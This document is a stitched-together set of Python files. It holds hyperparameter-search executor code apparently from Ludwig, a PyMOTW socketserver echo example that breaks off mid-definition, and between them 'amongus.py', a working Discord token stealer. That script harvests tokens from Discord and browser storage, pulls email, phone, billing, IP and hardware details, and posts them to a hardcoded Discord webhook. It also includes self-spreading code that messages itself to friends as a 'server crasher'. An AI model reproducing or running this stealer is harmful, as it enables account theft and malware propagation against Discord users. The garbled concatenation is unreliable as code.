allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> HyperoptResults:
ctx = multiprocessing.get_context('spawn')
if gpus is None:
gpus = get_available_gpus_cuda_string()
if gpus is not None:
num_available_cpus = ctx.cpu_count()
if self.num_workers > num_available_cpus:
logger.warning(
"WARNING: num_workers={}, num_available_cpus={}. "
"To avoid bottlenecks setting num workers to be less "
"or equal to number of available cpus is suggested".format(
self.num_workers, num_available_cpus
)
)
if isinstance(gpus, int):
gpus = str(gpus)
gpus = gpus.strip()
gpu_ids = gpus.split(",")
num_gpus = len(gpu_ids)
available_gpu_memory_list = get_available_gpu_memory()
gpu_ids_meta = {}
if num_gpus < self.num_workers:
fraction = (num_gpus / self.num_workers) - self.epsilon
for gpu_id in gpu_ids:
available_gpu_memory = available_gpu_memory_list[
int(gpu_id)]
required_gpu_memory = fraction * available_gpu_memory
if gpu_memory_limit is None:
logger.warning(
'WARNING: Setting gpu_memory_limit to {} '
'as there available gpus are {} '
'and the num of workers is {} '
'and the available gpu memory for gpu_id '
'{} is {}'.format(
required_gpu_memory, num_gpus,
self.num_workers,
gpu_id, available_gpu_memory)
)
new_gpu_memory_limit = required_gpu_memory - \
(
self.TF_REQUIRED_MEMORY_PER_WORKER * self.num_workers)
else:
new_gpu_memory_limit = gpu_memory_limit
if new_gpu_memory_limit > available_gpu_memory:
logger.warning(
'WARNING: Setting gpu_memory_limit to available gpu '
'memory {} minus an epsilon as the value specified is greater than '
'available gpu memory.'.format(
available_gpu_memory)
)
new_gpu_memory_limit = available_gpu_memory - self.epsilon_memory
if required_gpu_memory < new_gpu_memory_limit:
if required_gpu_memory > 0.5 * available_gpu_memory:
if available_gpu_memory != new_gpu_memory_limit:
logger.warning(
'WARNING: Setting gpu_memory_limit to available gpu '
'memory {} minus an epsilon as the gpus would be underutilized for '
'the parallel processes otherwise'.format(
available_gpu_memory)
)
new_gpu_memory_limit = available_gpu_memory - self.epsilon_memory
else:
logger.warning(
'WARNING: Setting gpu_memory_limit to {} '
'as the available gpus are {} and the num of workers '
'are {} and the available gpu memory for gpu_id '
'{} is {}'.format(
required_gpu_memory, num_gpus,
self.num_workers,
gpu_id, available_gpu_memory)
)
new_gpu_memory_limit = required_gpu_memory
else:
logger.warning(
'WARNING: gpu_memory_limit could be increased to {} '
'as the available gpus are {} and the num of workers '
'are {} and the available gpu memory for gpu_id '
'{} is {}'.format(
required_gpu_memory, num_gpus,
self.num_workers,
gpu_id, available_gpu_memory)
)
process_per_gpu = int(
available_gpu_memory / new_gpu_memory_limit)
gpu_ids_meta[gpu_id] = {
"gpu_memory_limit": new_gpu_memory_limit,
"process_per_gpu": process_per_gpu}
else:
for gpu_id in gpu_ids:
gpu_ids_meta[gpu_id] = {
"gpu_memory_limit": gpu_memory_limit,
"process_per_gpu": 1}
manager = ctx.Manager()
self.queue = manager.Queue()
for gpu_id in gpu_ids:
process_per_gpu = gpu_ids_meta[gpu_id]["process_per_gpu"]
gpu_memory_limit = gpu_ids_meta[gpu_id]["gpu_memory_limit"]
for _ in range(process_per_gpu):
gpu_id_meta = {"gpu_id": gpu_id,
"gpu_memory_limit": gpu_memory_limit}
self.queue.put(gpu_id_meta)
pool = ctx.Pool(self.num_workers,
ParallelExecutor.init_worker)
try:
trial_results = []
trials = 0
while not self.hyperopt_sampler.finished():
sampled_parameters = self.hyperopt_sampler.sample_batch()
hyperopt_parameters = []
for i, parameters in enumerate(sampled_parameters):
modified_config = substitute_parameters(
copy.deepcopy(config), parameters)
trial_id = trials + i
hyperopt_parameters.append(
dict(
parameters=parameters,
config=modified_config,
eval_split=self.split,
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
experiment_name=f'{experiment_name}_{trial_id}',
model_name=model_name,
# model_load_path=model_load_path,
# model_resume_path=model_resume_path,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
# needed because of concurrent HDF5 writes
skip_save_processed_input=True,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
backend=backend,
random_seed=random_seed,
debug=debug,
)
)
trials += len(sampled_parameters)
if gpus is not None:
batch_results = pool.map(self._run_experiment_gpu,
hyperopt_parameters)
else:
batch_results = pool.map(self._run_experiment,
hyperopt_parameters)
self.hyperopt_sampler.update_batch(
(result.parameters, result.metric_score)
for result in batch_results
)
trial_results.extend(batch_results)
finally:
pool.close()
pool.join()
ordered_trials = self.sort_hyperopt_results(trial_results)
return HyperoptResults(ordered_trials=ordered_trials)
class FiberExecutor(HyperoptExecutor):
num_workers = 2
fiber_backend = "local"
def __init__(
self,
hyperopt_sampler: HyperoptSampler,
output_feature: str,
metric: str,
split: str,
num_workers: int = 2,
num_cpus_per_worker: int = -1,
num_gpus_per_worker: int = -1,
fiber_backend: str = "local",
**kwargs
) -> None:
import fiber
HyperoptExecutor.__init__(self, hyperopt_sampler, output_feature,
metric, split)
fiber.init(backend=fiber_backend)
self.fiber_meta = fiber.meta
self.num_cpus_per_worker = num_cpus_per_worker
self.num_gpus_per_worker = num_gpus_per_worker
self.resource_limits = {}
if num_cpus_per_worker != -1:
self.resource_limits["cpu"] = num_cpus_per_worker
if num_gpus_per_worker != -1:
self.resource_limits["gpu"] = num_gpus_per_worker
self.num_workers = num_workers
self.pool = fiber.Pool(num_workers)
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
# model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> HyperoptResults:
experiment_kwargs = dict(
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
model_name=model_name,
# model_load_path=model_load_path,
# model_resume_path=model_resume_path,
eval_split=self.split,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
skip_save_processed_input=skip_save_processed_input,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
backend=backend,
random_seed=random_seed,
debug=debug,
)
experiemnt_fn = _run_experiment_unary
if self.resource_limits:
experiemnt_fn = self.fiber_meta(**self.resource_limits)(
experiemnt_fn)
trial_results = []
trials = 0
while not self.hyperopt_sampler.finished():
sampled_parameters = self.hyperopt_sampler.sample_batch()
metric_scores = []
stats_batch = self.pool.map(
experiemnt_fn,
[
{
'config': substitute_parameters(
copy.deepcopy(config), parameters),
'parameters': parameters,
'experiment_name': f'{experiment_name}_{trials + i}',
**experiment_kwargs
}
for i, parameters in enumerate(sampled_parameters)
],
)
trials += len(sampled_parameters)
for stats, parameters in zip(stats_batch, sampled_parameters):
train_stats, eval_stats = stats
metric_score = self.get_metric_score(train_stats, eval_stats)
metric_scores.append(metric_score)
trial_results.append(TrialResults(
parameters=parameters,
metric_score=metric_score,
training_stats=train_stats,
eval_stats=eval_stats,
))
self.hyperopt_sampler.update_batch(
zip(sampled_parameters, metric_scores))
ordered_trials = self.sort_hyperopt_results(trial_results)
return HyperoptResults(ordered_trials=ordered_trials)
class RayTuneExecutor(HyperoptExecutor):
def __init__(
self,
hyperopt_sampler,
output_feature: str,
metric: str,
split: str,
cpu_resources_per_trial: int = None,
gpu_resources_per_trial: int = None,
kubernetes_namespace: str = None,
time_budget_s: Union[int, float, datetime.timedelta] = None,
max_concurrent_trials: Optional[int] = None,
**kwargs
) -> None:
if ray is None:
raise ImportError('ray module is not installed. To '
'install it,try running pip install ray'
)
if not isinstance(hyperopt_sampler, RayTuneSampler):
raise ValueError('Sampler {} is not compatible with RayTuneExecutor, '
'please use the RayTuneSampler'.format(
hyperopt_sampler)
)
HyperoptExecutor.__init__(self, hyperopt_sampler, output_feature,
metric, split)
if not ray.is_initialized():
try:
ray.init('auto', ignore_reinit_error=True)
except ConnectionError:
logger.info('Initializing new Ray cluster...')
ray.init(ignore_reinit_error=True)
self.search_space = hyperopt_sampler.search_space
self.num_samples = hyperopt_sampler.num_samples
self.goal = hyperopt_sampler.goal
self.search_alg_dict = hyperopt_sampler.search_alg_dict
self.scheduler = hyperopt_sampler.scheduler
self.decode_ctx = hyperopt_sampler.decode_ctx
self.output_feature = output_feature
self.metric = metric
self.split = split
self.trial_id = 0
self.cpu_resources_per_trial = cpu_resources_per_trial
self.gpu_resources_per_trial = gpu_resources_per_trial
self.kubernetes_namespace = kubernetes_namespace
self.time_budget_s = time_budget_s
self.max_concurrent_trials = max_concurrent_trials
self.sync_config = None
@property
def _cpu_resources_per_trial_non_none(self):
return self.cpu_resources_per_trial or 1
@property
def _gpu_resources_per_trial_non_none(self):
return self.gpu_resources_per_trial or 0
def _get_sync_client_and_remote_checkpoint_dir(self, trial_dir: Path):
"""Get the Ray sync client and path to remote checkpoint directory."""
remote_checkpoint_dir = os.path.join(
self.sync_config.upload_dir, *_get_relative_checkpoints_dir_parts(trial_dir))
return get_cloud_sync_client(remote_checkpoint_dir), remote_checkpoint_dir
def _run_experiment(self, config, checkpoint_dir, hyperopt_dict, decode_ctx, is_using_ray_backend=False):
for gpu_id in ray.get_gpu_ids():
# Previous trial may not have freed its memory yet, so wait to avoid OOM
wait_for_gpu(gpu_id)
# Some config values may be JSON encoded as strings, so decode them here
config = RayTuneSampler.decode_values(config, decode_ctx)
trial_id = tune.get_trial_id()
modified_config = substitute_parameters(
copy.deepcopy(hyperopt_dict["config"]), config
)
trial_dir = Path(tune.get_trial_dir())
trial_location = ray.util.get_node_ip_address()
hyperopt_dict['config'] = modified_config
hyperopt_dict['experiment_name '] = f'{hyperopt_dict["experiment_name"]}_{trial_id}'
hyperopt_dict['output_directory'] = str(trial_dir)
tune_executor = self
if is_using_ray_backend:
ray_queue = RayQueue(actor_options={"num_cpus": 0})
else:
ray_queue = None
def checkpoint(progress_tracker, save_path):
with tune.checkpoint_dir(step=progress_tracker.epoch) as checkpoint_dir:
checkpoint_model = os.path.join(checkpoint_dir, 'model')
# shutil.copytree(save_path, checkpoint_model)
# Note: A previous implementation used shutil.copytree()
# however, this copying method is non atomic
if not os.path.isdir(checkpoint_model):
copy_id = uuid.uuid4()
tmp_dst = "%s.%s.tmp" % (checkpoint_model, copy_id)
assert os.path.exists(save_path)
shutil.copytree(save_path, tmp_dst)
try:
os.rename(tmp_dst, checkpoint_model)
except Exception:
shutil.rmtree(tmp_dst)
def report(progress_tracker):
train_stats = {
TRAINING: progress_tracker.train_metrics,
VALIDATION: progress_tracker.vali_metrics,
TEST: progress_tracker.test_metrics,
}
metric_score = tune_executor.get_metric_score(
train_stats, eval_stats=None)
tune.report(
parameters=json.dumps(config, cls=NumpyEncoder),
metric_score=metric_score,
training_stats=json.dumps(
train_stats[TRAINING], cls=NumpyEncoder),
eval_stats=json.dumps(
train_stats[VALIDATION], cls=NumpyEncoder),
trial_id=tune.get_trial_id(),
trial_dir=tune.get_trial_dir()
)
class RayTuneReportCallback(Callback):
def _get_sync_client_and_remote_checkpoint_dir(self):
# sync client has to be recreated to avoid issues with serialization
return tune_executor._get_sync_client_and_remote_checkpoint_dir(trial_dir)
def on_trainer_train_setup(self, trainer, save_path):
if is_using_ray_backend and checkpoint_dir and trial_location != ray.util.get_node_ip_address():
save_path = Path(save_path)
for path in trial_dir.glob("checkpoint*"):
if path not in (save_path.parent, checkpoint_dir):
shutil.rmtree(path, ignore_errors=True)
sync_client, remote_checkpoint_dir = self._get_sync_client_and_remote_checkpoint_dir()
sync_client.sync_down(
remote_checkpoint_dir, str(trial_dir.absolute()))
sync_client.wait()
def on_epoch_end(self, trainer, progress_tracker, save_path):
if is_using_ray_backend:
save_path = Path(save_path)
if trial_location != ray.util.get_node_ip_address():
sync_client, remote_checkpoint_dir = self._get_sync_client_and_remote_checkpoint_dir()
sync_client.sync_up(
str(save_path.parent.parent.absolute()), remote_checkpoint_dir)
sync_client.wait()
ray_queue.put((progress_tracker, str(save_path)))
return
checkpoint(progress_tracker, save_path)
report(progress_tracker)
callbacks = hyperopt_dict.get('callbacks') or []
hyperopt_dict['callbacks'] = callbacks + \
[RayTuneReportCallback()]
# set tune resources
if is_using_ray_backend:
resources = tune.get_trial_resources()
# check if we are using at least 1 gpu per trial
use_gpu = bool(self._gpu_resources_per_trial_non_none)
# get the resources assigned to the current trial
current_resources = resources.required_resources["GPU" if use_gpu else "CPU"]
hvd_kwargs = {
'num_workers': int(current_resources),
'use_gpu': use_gpu,
}
hyperopt_dict['backend'].set_distributed_kwargs(**hvd_kwargs)
logger.debug(
f"Trial horovod kwargs: {hvd_kwargs}")
stats = []
def _run():
train_stats, eval_stats = run_experiment(
**hyperopt_dict,
model_resume_path=checkpoint_dir,
parameters=config,
)
stats.append((train_stats, eval_stats))
if is_using_ray_backend:
# We have to pull the results to the trial actor
# from worker actors, as the Tune session is running
# only on the trial actor
thread = threading.Thread(target=_run)
thread.daemon = True
thread.start()
sync_client, remote_checkpoint_dir = self._get_sync_client_and_remote_checkpoint_dir(
trial_dir)
def check_queue():
qsize = ray_queue.qsize()
if qsize:
results = ray_queue.get_nowait_batch(qsize)
sync_client.sync_down(
remote_checkpoint_dir, str(trial_dir.absolute()))
sync_client.wait()
for progress_tracker, save_path in results:
checkpoint(progress_tracker, str(
trial_dir.joinpath(Path(save_path))))
report(progress_tracker)
while thread.is_alive():
thread.join(timeout=0)
check_queue()
time.sleep(0.1)
thread.join()
check_queue()
else:
# remove threading overhead
_run()
if not stats:
raise RuntimeError("Experiment did not complete.")
train_stats, eval_stats = stats.pop()
metric_score = self.get_metric_score(train_stats, eval_stats)
tune.report(
parameters=json.dumps(config, cls=NumpyEncoder),
metric_score=metric_score,
training_stats=json.dumps(train_stats, cls=NumpyEncoder),
eval_stats=json.dumps(eval_stats, cls=NumpyEncoder),
trial_id=tune.get_trial_id(),
trial_dir=tune.get_trial_dir()
)
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
# model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> RayTuneResults:
if isinstance(dataset, str) and not has_remote_protocol(dataset) and not os.path.isabs(dataset):
dataset = os.path.abspath(dataset)
if isinstance(backend, str):
backend = initialize_backend(backend)
if gpus is not None:
raise ValueError("Parameter `gpus` is not supported when using Ray Tune. "
"Configure GPU resources with Ray and set `gpu_resources_per_trial` in your "
"hyperopt config.")
hyperopt_dict = dict(
config=config,
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
experiment_name=experiment_name,
model_name=model_name,
# model_load_path=model_load_path,
# model_resume_path=model_resume_path,
eval_split=self.split,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
skip_save_processed_input=skip_save_processed_input,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
backend=backend,
random_seed=random_seed,
debug=debug,
)
mode = "min" if self.goal != MAXIMIZE else "max"
metric = "metric_score"
if self.search_alg_dict is not None:
if TYPE not in self.search_alg_dict:
logger.warning(
"WARNING: Kindly set type param for search_alg "
"to utilize Tune's Search Algorithms."
)
search_alg = None
else:
search_alg_type = self.search_alg_dict.pop(TYPE)
search_alg = tune.create_searcher(
search_alg_type, metric=metric, mode=mode, **self.search_alg_dict)
else:
search_alg = None
if self.max_concurrent_trials:
assert self.max_concurrent_trials > 0, f"`max_concurrent_trials` must be greater than 0, got {self.max_concurrent_trials}"
if isinstance(search_alg, BasicVariantGenerator) or search_alg is None:
search_alg = BasicVariantGenerator(
max_concurrent=self.max_concurrent_trials)
elif isinstance(search_alg, ConcurrencyLimiter):
raise ValueError(
"You have specified `max_concurrent_trials`, but the search "
"algorithm is already a `ConcurrencyLimiter`. FIX THIS "
"by setting `max_concurrent_trials=None`."
)
else:
search_alg = ConcurrencyLimiter(
search_alg, max_concurrent=self.max_concurrent_trials)
resources_per_trial = {
"cpu": self._cpu_resources_per_trial_non_none,
"gpu": self._gpu_resources_per_trial_non_none,
}
def run_experiment_trial(config, checkpoint_dir=None):
return self._run_experiment(config, checkpoint_dir, hyperopt_dict, self.decode_ctx, _is_ray_backend(backend))
tune_config = {}
tune_callbacks = []
for callback in callbacks or []:
run_experiment_trial, tune_config = callback.prepare_ray_tune(
run_experiment_trial,
tune_config,
tune_callbacks,
)
if _is_ray_backend(backend):
# we can't set Trial actor's CPUs to 0 so we just go very low
resources_per_trial = PlacementGroupFactory(
[{"CPU": 0.001}] + ([{"CPU": 1, "GPU": 1}] * self._gpu_resources_per_trial_non_none) if self._gpu_resources_per_trial_non_none else (
[{"CPU": 0.001}] + [{"CPU": 1}] * self._cpu_resources_per_trial_non_none)
)
if has_remote_protocol(output_directory):
run_experiment_trial = tune.durable(run_experiment_trial)
self.sync_config = tune.SyncConfig(
sync_to_driver=False,
upload_dir=output_directory
)
output_directory = None
elif self.kubernetes_namespace:
from ray.tune.integration.kubernetes import NamespacedKubernetesSyncer
self.sync_config = tune.SyncConfig(
sync_to_driver=NamespacedKubernetesSyncer(
self.kubernetes_namespace)
)
register_trainable(
f"trainable_func_f{hash_dict(config).decode('ascii')}",
run_experiment_trial
)
analysis = tune.run(
f"trainable_func_f{hash_dict(config).decode('ascii')}",
config={
**self.search_space,
**tune_config,
},
scheduler=self.scheduler,
search_alg=search_alg,
num_samples=self.num_samples,
keep_checkpoints_num=1,
resources_per_trial=resources_per_trial,
time_budget_s=self.time_budget_s,
queue_trials=False,
sync_config=self.sync_config,
local_dir=output_directory,
metric=metric,
mode=mode,
trial_name_creator=lambda trial: f"trial_{trial.trial_id}",
trial_dirname_creator=lambda trial: f"trial_{trial.trial_id}",
callbacks=tune_callbacks,
)
ordered_trials = analysis.results_df.sort_values(
"metric_score",
ascending=self.goal != MAXIMIZE
)
# Catch nans in edge case where the trial doesn't complete
temp_ordered_trials = []
for kwargs in ordered_trials.to_dict(orient="records"):
for key in ['parameters', 'training_stats', 'eval_stats']:
if isinstance(kwargs[key], float):
kwargs[key] = {}
temp_ordered_trials.append(kwargs)
ordered_trials = [
TrialResults.from_dict(
load_json_values(kwargs)
)
for kwargs in temp_ordered_trials
]
return RayTuneResults(
ordered_trials=ordered_trials,
experiment_analysis=analysis
)
def get_build_hyperopt_executor(executor_type):
return get_from_registry(executor_type, executor_registry)
executor_registry = {
"serial": SerialExecutor,
"parallel": ParallelExecutor,
"fiber": FiberExecutor,
"ray": RayTuneExecutor
}
def set_values(model_dict, name, parameters_dict):
if name in parameters_dict:
params = parameters_dict[name]
for key, value in params.items():
if isinstance(value, dict):
for sub_key, sub_value in value.items():
model_dict[key][sub_key] = sub_value
else:
model_dict[key] = value
def get_parameters_dict(parameters):
parameters_dict = {}
for name, value in parameters.items():
curr_dict = parameters_dict
name_list = name.split(".")
for i, name_elem in enumerate(name_list):
if i == len(name_list) - 1:
curr_dict[name_elem] = value
else:
name_dict = curr_dict.get(name_elem, {})
curr_dict[name_elem] = name_dict
curr_dict = name_dict
return parameters_dict
def substitute_parameters(config, parameters):
parameters_dict = get_parameters_dict(parameters)
for input_feature in config["input_features"]:
set_values(input_feature, input_feature[COLUMN], parameters_dict)
for output_feature in config["output_features"]:
set_values(output_feature, output_feature[COLUMN], parameters_dict)
set_values(config["combiner"], "combiner", parameters_dict)
set_values(config["training"], "training", parameters_dict)
set_values(config["preprocessing"], "preprocessing",
parameters_dict)
return config
def run_experiment(
config,
parameters=None,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
model_resume_path=None,
eval_split=VALIDATION,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=False,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
):
for callback in callbacks or []:
callback.on_hyperopt_trial_start(parameters)
# Collect training and validation losses and metrics
# & append it to `results`
model = LudwigModel(
config=config,
backend=backend,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
)
eval_stats, train_stats, _, _ = model.experiment(
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
experiment_name=experiment_name,
model_name=model_name,
# model_load_path=model_load_path,
model_resume_path=model_resume_path,
eval_split=eval_split,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
skip_save_processed_input=skip_save_processed_input,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
skip_collect_predictions=True,
skip_collect_overall_stats=False,
random_seed=random_seed,
debug=debug,
)
for callback in callbacks or []:
callback.on_hyperopt_trial_end(parameters)
return train_stats, eval_stats
def _run_experiment_unary(kwargs):
"""Unary function is needed by Fiber to map a list of args."""
return run_experiment(**kwargs)
|
amongus.py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from datetime import datetime
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
dt = datetime.now()
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/916150945635782737/pEV5ZQLezY4IZtsgMCqX_4ejofTUeMyk3YCEssQTLPZ1NY4vWB-OiZOlRC-VPcrPZK9K'
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Firefox" : LOCAL + "\\Mozilla\\Firefox\\User Data\\Profiles",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Edge" : LOCAL + "\\\Microsoft\\Edge\\User Data\\Default",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default",
"Vivaldi" : LOCAL + "\\Vivaldi\\User Data\\User Data",
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
flags = user_data.get("public_flags")
billing = bool(has_payment_methods(token))
embed = {
"color": 0x5865f2,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
},
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": "Hooked at • " + dt.strftime('%Y-%m-%d %H:%M:%S'),
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "CStealer",
"avatar_url": "https://i.hizliresim.com/9ftjid9.jpg"
}
try:
urlopen(Request(WEBHOOK_URL, data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
© 2021 GitHub, Inc.
Terms
|
pymotw.py
|
'''
import socketserver
class EchoRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
# Echo the back to the client
data = self.request.recv(1024)
self.request.send(data)
return
if __name__ == '__main__':
import socket
import threading
address = ('localhost', 0) # let the kernel assign a port
server = socketserver.TCPServer(address, EchoRequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
# Connect to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Send the data
message = 'Hello, world'.encode()
print('Sending : {!r}'.format(message))
len_sent = s.send(message)
# Receive a response
response = s.recv(len_sent)
print('Received: {!r}'.format(response))
# Clean up
server.shutdown()
s.close()
server.socket.close()
'''
import logging
import sys
import socketserver
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
class EchoRequestHandler(socketserver.BaseRequestHandler):
def __init__(self, request, client_address, server):
